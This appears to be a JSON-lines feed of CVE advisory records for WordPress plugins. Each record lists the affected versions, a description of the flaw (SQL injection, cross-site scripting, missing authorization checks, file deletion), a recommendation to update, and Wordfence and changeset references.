{"CVE_ID":"CVE-2024-5756","slug":"email-subscribers","versionImpact":"5.7.23","versionEndExcluding":"5.7.24","description":"The Email Subscribers by Icegram Express \u2013 Email Marketing, Newsletters, Automation for WordPress & WooCommerce plugin for WordPress is vulnerable to time-based SQL Injection via the db parameter in all versions up to, and including, 5.7.23 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 5.7.24, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c5bd11c6-2f55-4eee-834a-c4e405482b9c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c5bd11c6-2f55-4eee-834a-c4e405482b9c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-subscribers\\\/trunk\\\/lite\\\/includes\\\/db\\\/class-es-db-contacts.php#L532\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-subscribers\\\/trunk\\\/lite\\\/includes\\\/db\\\/class-es-db-contacts.php#L532\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3101638\\\/email-subscribers\\\/trunk\\\/lite\\\/includes\\\/db\\\/class-es-db-contacts.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3101638\\\/email-subscribers\\\/trunk\\\/lite\\\/includes\\\/db\\\/class-es-db-contacts.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4845","slug":"email-subscribers","versionImpact":"5.7.22","versionEndExcluding":"5.7.23","description":"The Icegram Express plugin for WordPress is vulnerable to SQL Injection via the \u2018options[list_id]\u2019 parameter in all versions up to, and including, 5.7.22 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 5.7.23, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/21be2215-8ce0-438e-94e0-6a350b8cc952?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/21be2215-8ce0-438e-94e0-6a350b8cc952?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3098321\\\/email-subscribers\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3098321\\\/email-subscribers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4295","slug":"email-subscribers","versionImpact":"5.7.20","versionEndExcluding":"5.7.21","description":"The Email Subscribers by Icegram Express plugin for WordPress is vulnerable to SQL Injection via the \u2018hash\u2019 parameter in all versions up to, and including, 5.7.20 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 5.7.21, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/641123af-1ec6-4549-a58c-0a08b4678f45?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/641123af-1ec6-4549-a58c-0a08b4678f45?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090845\\\/email-subscribers\\\/trunk\\\/lite\\\/includes\\\/db\\\/class-es-db-lists-contacts.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090845\\\/email-subscribers\\\/trunk\\\/lite\\\/includes\\\/db\\\/class-es-db-lists-contacts.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4010","slug":"email-subscribers","versionImpact":"5.7.19","versionEndExcluding":"5.7.20","description":"The Email Subscribers by Icegram Express plugin for WordPress is vulnerable to unauthorized access of data, modification of data, and loss of data due to a missing capability check on the handle_ajax_request function in all versions up to, and including, 5.7.19. This makes it possible for authenticated attackers, with subscriber-level access and above, to cause a loss of confidentiality, integrity, and availability, by performing multiple unauthorized actions. Some of these actions could also be leveraged to conduct PHP Object Injection and SQL Injection attacks.","recommendation":"Update to version 5.7.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/23bfcdd1-b99d-47eb-9f88-96f9ecc53b32?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/23bfcdd1-b99d-47eb-9f88-96f9ecc53b32?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083762\\\/email-subscribers\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083762\\\/email-subscribers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3626","slug":"email-subscribers","versionImpact":"5.7.17","versionEndExcluding":"5.7.18","description":"The Email Subscribers by Icegram Express \u2013 Email Marketing, Newsletters, Automation for WordPress & WooCommerce plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the get_template_content function in all versions up to, and including, 5.7.17. This makes it possible for authenticated attackers, with subscriber access and above, to obtain the contents of private and password-protected posts.","recommendation":"Update to version 5.7.18, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5a56e621-2508-4500-b865-4d5e4463b91a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5a56e621-2508-4500-b865-4d5e4463b91a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-subscribers\\\/trunk\\\/lite\\\/includes\\\/class-email-subscribers.php#L1063\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-subscribers\\\/trunk\\\/lite\\\/includes\\\/class-email-subscribers.php#L1063\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-subscribers\\\/trunk\\\/lite\\\/admin\\\/class-email-subscribers-admin.php#L849\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-subscribers\\\/trunk\\\/lite\\\/admin\\\/class-email-subscribers-admin.php#L849\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3072302%40email-subscribers%2Ftrunk&old=3069441%40email-subscribers%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3072302%40email-subscribers%2Ftrunk&old=3069441%40email-subscribers%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2876","slug":"email-subscribers","versionImpact":"5.7.14","versionEndExcluding":"5.7.15","description":"The Email Subscribers by Icegram Express \u2013 Email Marketing, Newsletters, Automation for WordPress & WooCommerce plugin for WordPress is vulnerable to SQL Injection via the 'run' function of the 'IG_ES_Subscribers_Query' class in all versions up to, and including, 5.7.14 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 5.7.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e0ca6ac4-0d89-4601-94fc-cce5a0af9c56?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e0ca6ac4-0d89-4601-94fc-cce5a0af9c56?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/WordpressPluginDirectory\\\/email-subscribers\\\/blob\\\/main\\\/email-subscribers\\\/lite\\\/includes\\\/classes\\\/class-ig-es-subscriber-query.php#L304\",\"name\":\"https:\\\/\\\/github.com\\\/WordpressPluginDirectory\\\/email-subscribers\\\/blob\\\/main\\\/email-subscribers\\\/lite\\\/includes\\\/classes\\\/class-ig-es-subscriber-query.php#L304\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/WordpressPluginDirectory\\\/email-subscribers\\\/blob\\\/main\\\/email-subscribers\\\/lite\\\/admin\\\/class-email-subscribers-admin.php#L1433\",\"name\":\"https:\\\/\\\/github.com\\\/WordpressPluginDirectory\\\/email-subscribers\\\/blob\\\/main\\\/email-subscribers\\\/lite\\\/admin\\\/class-email-subscribers-admin.php#L1433\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3060251\\\/email-subscribers\\\/trunk\\\/lite\\\/includes\\\/classes\\\/class-ig-es-subscriber-query.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3060251\\\/email-subscribers\\\/trunk\\\/lite\\\/includes\\\/classes\\\/class-ig-es-subscriber-query.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6600","slug":"host-webfonts-local","versionImpact":"5.7.9","versionEndExcluding":"5.7.10","description":"The OMGF | GDPR\/DSGVO Compliant, Faster Google Fonts. Easy. plugin for WordPress is vulnerable to unauthorized modification of data and Stored Cross-Site Scripting due to a missing capability check on the update_settings() function hooked via admin_init in all versions up to, and including, 5.7.9. This makes it possible for unauthenticated attackers to update the plugin's settings which can be used to inject Cross-Site Scripting payloads and delete entire directories. PLease note there were several attempted patched, and we consider 5.7.10 to be the most sufficiently patched.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4e835b97-c066-4e8f-b99f-1a930105af0c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4e835b97-c066-4e8f-b99f-1a930105af0c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3008876%40host-webfonts-local&new=3008876%40host-webfonts-local&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3008876%40host-webfonts-local&new=3008876%40host-webfonts-local&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3009010%40host-webfonts-local&new=3009010%40host-webfonts-local&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3009010%40host-webfonts-local&new=3009010%40host-webfonts-local&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3009453%40host-webfonts-local&new=3009453%40host-webfonts-local&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3009453%40host-webfonts-local&new=3009453%40host-webfonts-local&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7856","slug":"mp3-music-player-by-sonaar","versionImpact":"5.7.0.1","versionEndExcluding":"5.7.1","description":"The MP3 Audio Player \u2013 Music Player, Podcast Player & Radio by Sonaar plugin for WordPress is vulnerable to unauthorized arbitrary file deletion due to a missing capability check on the removeTempFiles() function and insufficient path validation on the 'file' parameter in all versions up to, and including, 5.7.0.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete arbitrary files which can make remote code execution possible when wp-config.php is deleted.","recommendation":"Update to version 5.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/43adc9dd-1780-440f-90c2-ff05a22eb084?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/43adc9dd-1780-440f-90c2-ff05a22eb084?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mp3-music-player-by-sonaar\\\/tags\\\/5.7.0.1\\\/includes\\\/class-sonaar-music.php#L755\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mp3-music-player-by-sonaar\\\/tags\\\/5.7.0.1\\\/includes\\\/class-sonaar-music.php#L755\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3142445\\\/mp3-music-player-by-sonaar\\\/trunk\\\/includes\\\/class-sonaar-music.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3142445\\\/mp3-music-player-by-sonaar\\\/trunk\\\/includes\\\/class-sonaar-music.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mp3-music-player-by-sonaar\\\/tags\\\/5.7.0.1\\\/includes\\\/class-sonaar-music.php#L739\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mp3-music-player-by-sonaar\\\/tags\\\/5.7.0.1\\\/includes\\\/class-sonaar-music.php#L739\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4372","slug":"litespeed-cache","versionImpact":"5.6","versionEndExcluding":"5.7","description":"The LiteSpeed Cache plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'esi' shortcode in versions up to, and including, 5.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/27026f0f-c85e-4409-9973-4b9cb8a90da5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/27026f0f-c85e-4409-9973-4b9cb8a90da5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/litespeed-cache\\\/tags\\\/5.5.1\\\/src\\\/esi.cls.php#L480\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/litespeed-cache\\\/tags\\\/5.5.1\\\/src\\\/esi.cls.php#L480\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/litespeedtech\\\/lscache_wp\\\/commit\\\/95a407d9f192b37ac6cf96d2aa50f240e3e6b2d7#diff-7b2c514b58d1b8a71655607bdfab87cedb013bc1b8927ce0b49a89ddf4a7e01cR495\",\"name\":\"https:\\\/\\\/github.com\\\/litespeedtech\\\/lscache_wp\\\/commit\\\/95a407d9f192b37ac6cf96d2aa50f240e3e6b2d7#diff-7b2c514b58d1b8a71655607bdfab87cedb013bc1b8927ce0b49a89ddf4a7e01cR495\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2977143\\\/litespeed-cache#file348\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2977143\\\/litespeed-cache#file348\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10614","slug":"customer-reviews-woocommerce","versionImpact":"5.61.0","versionEndExcluding":"5.62.0","description":"The Customer Reviews for WooCommerce plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the cancel_import() function in all versions up to, and including, 5.61.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to cancel and import or check on the status.","recommendation":"Update to version 5.62.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e27224aa-56c4-49ab-b9b3-b431b38e126e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e27224aa-56c4-49ab-b9b3-b431b38e126e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188169\\\/customer-reviews-woocommerce\\\/trunk\\\/includes\\\/import-export\\\/class-cr-reviews-importer.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188169\\\/customer-reviews-woocommerce\\\/trunk\\\/includes\\\/import-export\\\/class-cr-reviews-importer.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11463","slug":"debounce-io-email-validator","versionImpact":"5.6.5","versionEndExcluding":"5.6.6","description":"The DeBounce Email Validator plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'from', 'to', and 'key' parameters in all versions up to, and including, 5.6.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 5.6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3194566%40debounce-io-email-validator&new=3194566%40debounce-io-email-validator&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3194566%40debounce-io-email-validator&new=3194566%40debounce-io-email-validator&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39e8c8e1-5bf4-4e4a-91a3-cf884cccf374?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39e8c8e1-5bf4-4e4a-91a3-cf884cccf374?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5555","slug":"bdthemes-element-pack-lite","versionImpact":"5.6.5","versionEndExcluding":"5.6.6","description":"The Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid & Carousel, Remote Arrows) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018social-link-title\u2019 parameter in all versions up to, and including, 5.6.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cdb69e0e-f3d4-4b5b-9bdf-14018f4c7ecc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cdb69e0e-f3d4-4b5b-9bdf-14018f4c7ecc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/modules\\\/member\\\/widgets\\\/member.php#L1273\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/modules\\\/member\\\/widgets\\\/member.php#L1273\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3096559\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3096559\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4943","slug":"miniorange-2-factor-authentication","versionImpact":"5.6.5","versionEndExcluding":"5.6.6","description":"The miniOrange's Google Authenticator plugin for WordPress is vulnerable to authorization bypass due to a missing capability check when changing plugin settings in versions up to, and including, 5.6.5. This makes it possible for unauthenticated attackers to change the plugin's settings.","recommendation":"Update to version 5.6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7267ede1-7745-47cc-ac0d-4362140b4c23?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7267ede1-7745-47cc-ac0d-4362140b4c23?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2842228%40miniorange-2-factor-authentication%2Ftrunk&old=2815645%40miniorange-2-factor-authentication%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2842228%40miniorange-2-factor-authentication%2Ftrunk&old=2815645%40miniorange-2-factor-authentication%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4213","slug":"wp-easycart","versionImpact":"5.6.4","versionEndExcluding":"5.6.5","description":"The Shopping Cart & eCommerce Store plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 5.6.4 via the order report functionality. This makes it possible for unauthenticated attackers to extract sensitive data including order details such as payment details, addresses and other PII.","recommendation":"Update to version 5.6.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93daab72-1243-4a05-91d3-9254a1aac727?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93daab72-1243-4a05-91d3-9254a1aac727?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3084202\\\/wp-easycart\\\/trunk\\\/admin\\\/inc\\\/wp_easycart_admin.php?old=3068711&old_path=wp-easycart%2Ftrunk%2Fadmin%2Finc%2Fwp_easycart_admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3084202\\\/wp-easycart\\\/trunk\\\/admin\\\/inc\\\/wp_easycart_admin.php?old=3068711&old_path=wp-easycart%2Ftrunk%2Fadmin%2Finc%2Fwp_easycart_admin.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2346","slug":"filebird","versionImpact":"5.6.3","versionEndExcluding":"5.6.4","description":"The FileBird \u2013 WordPress Media Library Folders & File Manager plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 5.6.3 via folder deletion due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with author access or higher, to delete folders created by other users and make their file uploads visible.","recommendation":"Update to version 5.6.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/82cde234-ae87-438f-911e-bdd0e3ac1132?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/82cde234-ae87-438f-911e-bdd0e3ac1132?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3060898%40filebird%2Ftrunk&old=3049188%40filebird%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3060898%40filebird%2Ftrunk&old=3049188%40filebird%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2345","slug":"filebird","versionImpact":"5.6.3","versionEndExcluding":"5.6.4","description":"The FileBird \u2013 WordPress Media Library Folders & File Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the folder name parameter in all versions up to, and including, 5.6.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.6.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/129cc3b0-4f48-4846-902e-be5cd339f537?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/129cc3b0-4f48-4846-902e-be5cd339f537?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3060898%40filebird%2Ftrunk&old=3049188%40filebird%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3060898%40filebird%2Ftrunk&old=3049188%40filebird%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3927","slug":"bdthemes-element-pack-lite","versionImpact":"5.6.3","versionEndExcluding":"5.6.4","description":"The Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid & Carousel, Remote Arrows) plugin for WordPress is vulnerable to Form Submission Admin Email Bypass  in all versions up to, and including, 5.6.3. This is due to the plugin not properly checking for all variations of an administrators emails. This makes it possible for unauthenticated attackers to bypass the restriction using a +value when submitting the contact form.","recommendation":"Update to version 5.6.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3a703fc4-6c61-442e-a637-515e9f501575?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3a703fc4-6c61-442e-a637-515e9f501575?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/modules\\\/contact-form\\\/module.php#L102\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/modules\\\/contact-form\\\/module.php#L102\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3089154\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3089154\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5583","slug":"the-plus-addons-for-elementor-page-builder","versionImpact":"5.6.2","versionEndExcluding":"5.6.3","description":"The The Plus Addons for Elementor \u2013 Elementor Addons, Page Templates, Widgets, Mega Menu, WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the carousel_direction parameter of testimonials widget in all versions up to, and including, 5.6.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/55981e72-8d1a-4075-a372-6bddc95e99d8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/55981e72-8d1a-4075-a372-6bddc95e99d8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.5.6\\\/modules\\\/widgets\\\/tp_testimonial_listout.php#L2284\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.5.6\\\/modules\\\/widgets\\\/tp_testimonial_listout.php#L2284\",\"refsource\":\"\",\"tags\":[]}]"}
